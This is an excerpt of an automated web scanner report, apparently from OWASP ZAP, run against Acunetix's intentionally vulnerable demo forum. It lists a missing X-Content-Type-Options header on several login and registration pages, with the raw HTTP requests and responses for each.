InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40 |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=40 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:00 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5 |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 363 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=5 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:50 GMT Content-Length: 3133 |
| Response Body - size: 3,133 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6 |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 363 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=6 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:50 GMT Content-Length: 3133 |
| Response Body - size: 3,133 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7 |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 363 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=7 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:50 GMT Content-Length: 3133 |
| Response Body - size: 3,133 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8 |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 363 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=8 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:51 GMT Content-Length: 3133 |
| Response Body - size: 3,133 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9 |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 363 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=9 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:51 GMT Content-Length: 3133 |
| Response Body - size: 3,133 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 399 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/Templatize.asp?item=html/about.html Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:23 GMT Content-Length: 3256 |
| Response Body - size: 3,256 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2FDefault%2Easp%3F |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2FDefault%2Easp%3F HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:22 GMT Content-Length: 3615 |
| Response Body - size: 3,615 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FDefault%2Easp%3F" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FDefault%2Easp%3F" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3F |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 347 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3F HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/Search.asp Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
